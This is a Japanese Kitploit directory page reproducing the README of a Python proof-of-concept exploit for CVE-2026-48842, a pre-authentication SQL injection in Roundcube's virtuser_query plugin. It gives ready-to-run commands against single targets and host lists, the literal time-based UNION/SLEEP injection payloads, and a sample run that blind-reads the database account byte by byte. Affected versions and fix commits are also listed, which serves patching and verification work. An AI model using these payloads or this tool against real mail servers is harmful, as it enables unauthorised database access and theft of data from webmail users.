Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-48842 — CVE-2026-48842(Roundcubeのvirtuser_queryプラグインにおける認証前SQLインジェクション)のPython PoC。時間ベースの差分により脆弱性を確認し、DBアカウントをブラインドリードする。 | Kitploit
ツール/GitHubGitHub/4minx/cve-2026-48842
脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストデータベースセキュリティ
GitHub4minx/cve-2026-48842

CVE-2026-48842

CVE-2026-48842(Roundcubeのvirtuser_queryプラグインにおける認証前SQLインジェクション)のPython PoC。時間ベースの差分により脆弱性を確認し、DBアカウントをブラインドリードする。

リポジトリを見る
7時間48分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-48842 PoC — Roundcube virtuser_query 認証前 SQLi

CVE-2026-48842 の PoC。Roundcube Webmail のオプションの virtuser_query プラグインにおける認証前 SQL インジェクションです。

このツールは 2 つのことを行い、どちらについても推測を拒否します。

  1. 確認 — 真/偽の差分(単一の sleep ではない)でインジェクションを確認します。
  2. 影響の証明 — --dumpdbuser でターゲットからデータベースアカウントを読み取ります。

各プローブが生成する正確な SQL を出力するため、失敗または決定的でない結果が脆弱性として提示されることはありません。


脆弱性情報

CVECVE-2026-48842
種類CWE-89 — SQL インジェクション
コンポーネントplugins/virtuser_query/virtuser_query.php(デフォルトでは有効化されていません)
影響を受けるバージョンRoundcube 1.6.x < 1.6.16、1.7.x < 1.7.1
修正済み1.6.16、1.7.1

要件

  • Python 3.9+
  • requests
root@kitploit:~
pip install requests

使用方法

単一ターゲット、検出のみ

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld

単一ターゲット、DB アカウントを読み取って影響を証明

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld --dumpdbuser

より高速なオラクル(負荷の高いホストでは調整が必要な場合があります)

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld -d 3 --dumpdbuser

多数のターゲット

root@kitploit:~
python cve_2026_48842_poc.py --list hosts.txt
python cve_2026_48842_poc.py --list hosts.txt -d 3

オプション

引数説明デフォルト
targetRoundcube のベース URL、例: https://mail.example.tld または http://host/roundcube—
-l, --list FILE1 行につき 1 つのターゲット URL を記述したファイル。# でコメントが始まります。—
-d, --delay Nオラクルプローブごとの SLEEP 秒数7
--dumpdbuserインジェクション確認後、CURRENT_USER() をブラインドリードoff
-h, --helpヘルプを表示—

出力例

ローカルの Roundcube 1.6.15 に対する実際の実行:

root@kitploit:~
[*] http://127.0.0.1/roundcube
    version=1.6.15  noise_floor=0.071s  _token=yes

[1] detection  injected=True  delta(true-false)=6.026s  delta(true-baseline)=6.015s  threshold=1.8s
    baseline                0.083s  http=401  sql_error=None
        _user=poc_baseline_user_9f2a
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='poc_baseline_user_9f2a'
    artifact_unterminated    0.09s  http=401  sql_error=None
        _user=a%5C
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='a\'
    injected_true           6.098s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D1%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=1,SLEEP(3),0)-- -'
    injected_false          0.072s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D2%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=2,SLEEP(3),0)-- -'

[2] blind read of the database account (~42s per byte, no quotes used)
    subquery: SELECT CURRENT_USER()
    length=14 bytes
    [  1/14] 'r'      [  2/14] 'ro'     [  3/14] 'roo'    [  4/14] 'root'
    [  5/14] 'root@'  [  6/14] 'root@l'  [  7/14] 'root@lo' [  8/14] 'root@loc'
    [  9/14] 'root@loca'  [ 10/14] 'root@local'  [ 11/14] 'root@localh'
    [ 12/14] 'root@localho' [ 13/14] 'root@localhos' [ 14/14] 'root@localhost'

[+] database account = 'root@localhost'

☕ サポート

このプロジェクトが役に立ったなら、開発を支援することをご検討ください:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

参考資料

  • Roundcube セキュリティアドバイザリ 2026-05-24 — https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
  • 修正コミット (1.6.x) — https://github.com/roundcube/roundcubemail/commit/3406183a9976e36f992d3468f37d0e2346526ee9
  • 修正コミット (1.7.x) — https://github.com/roundcube/roundcubemail/commit/87124cc7136a48b5fa9d2b40dfead6e9dcaeaf4b
  • NVD — https://nvd.nist.gov/vuln/detail/CVE-2026-48842
ツールをダウンロード